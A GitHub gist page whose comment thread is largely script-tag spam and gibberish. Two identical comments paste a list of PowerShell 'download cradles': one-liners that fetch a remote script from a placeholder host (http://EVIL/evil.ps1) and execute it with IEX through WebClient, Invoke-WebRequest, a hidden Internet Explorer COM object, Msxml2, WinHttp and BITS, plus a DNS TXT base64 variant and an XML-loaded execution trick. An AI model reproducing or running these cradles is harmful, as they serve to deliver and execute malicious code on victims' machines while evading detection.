Skip to content

Instantly share code, notes, and snippets.

@mattn
Created April 28, 2011 13:19
Show Gist options
  • Save mattn/946330 to your computer and use it in GitHub Desktop.
Save mattn/946330 to your computer and use it in GitHub Desktop.
<script src=https://gist.github.com/raw/946328/gistfile1.txt ><\/script>
@MRSAJIB
Copy link

MRSAJIB commented May 22, 2020

<script src="https://gist.github.com/kuamit5516/99897918fd94e8c5310c370f3211e83e.js"></script>

@ahmedmengal
Copy link

<script src="https://gist.github.com/ahmedmengal/37bdc23b83288c21f83a64adec451efb.js"></script>

@broimagoat
Copy link

<script src="https://gist.github.com/arguiot/5abf1b7bef3f7be493be3bda63f88dcb.js"></script>

@cheese20plzaddmetothescript

why is the song cradles so good?

@cheese20plzaddmetothescript

normal download cradle

IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

PowerShell 3.0+

IEX (iwr 'http://EVIL/evil.ps1')

hidden IE com object

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

Msxml2.XMLHTTP COM object

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

WinHttp COM object (not proxy aware!)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

using bitstransfer- touches disk!

Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)

code to execute needs to be a base64 encoded string stored in a TXT record

IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

from @subTee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d

<#

Get-Process #> $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex

@cheese20plzaddmetothescript

normal download cradle

IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

PowerShell 3.0+

IEX (iwr 'http://EVIL/evil.ps1')

hidden IE com object

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

Msxml2.XMLHTTP COM object

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

WinHttp COM object (not proxy aware!)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

using bitstransfer- touches disk!

Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)

code to execute needs to be a base64 encoded string stored in a TXT record

IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

from @subTee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d

<#

Get-Process #> $a = New-Object System.Xml.XmlDocument $a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt") $a.command.a.execute | iex

@Bmwx
Copy link

Bmwx commented Feb 26, 2021

<script src="https://gist.github.com/Watreni/b4e31ca33730ffe7259194cb3b385bb8.js"></script>

@cgu2
Copy link

cgu2 commented Apr 8, 2021

<script src="https://gist.github.com/ssmereka/6517444.js"></script>

@NathanXID
Copy link

<script src="https://gist.github.com/NathanXID/2fee8e4c5e6a082dc215f0da91cf7a5c.js"></script>

@EYExPatch
Copy link

<script src="https://gist.github.com/leaky-coder/4f3c403adfbc7c925bbb239713428f39.js"></script>

@thanhdepzaiheh
Copy link

<script src="https://gist.github.com/iNPUTmice/28113eecccf50dc81d266c4215cb1264.js"></script>

@martytyty2098
Copy link

<script src="https://gist.github.com/martytyty2098/baf42f8ff0bfae517971448ee0cdae19.js"></script>

@benchuophobia
Copy link

@v1ck3
Copy link

v1ck3 commented Apr 28, 2024

THIS ONE IS MINE !!!

<script src="https://gist.github.com/v1ck3/dcebc4ccd329d14f91e6886aa05b8fab.js"></script>

@Suvinder143
Copy link

Tsyfigg

@Suvinder143
Copy link

Hi ugufrdhv

@Suvinder143
Copy link

Vi hi ha sh hy r jhy

@Suvinder143
Copy link

Yes nohgffi

@Suvinder143
Copy link

1000062957
Nabu

@Suvinder143
Copy link

Yes boss

@Sbauermaner
Copy link

Я тут с вами

@Sbauermaner
Copy link

IMG_20241006_003731

@Tichi435
Copy link

<script src="https://gist.github.com/mattn/946330.js"></script>

@Dano6210
Copy link

guys what should i do with this file?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment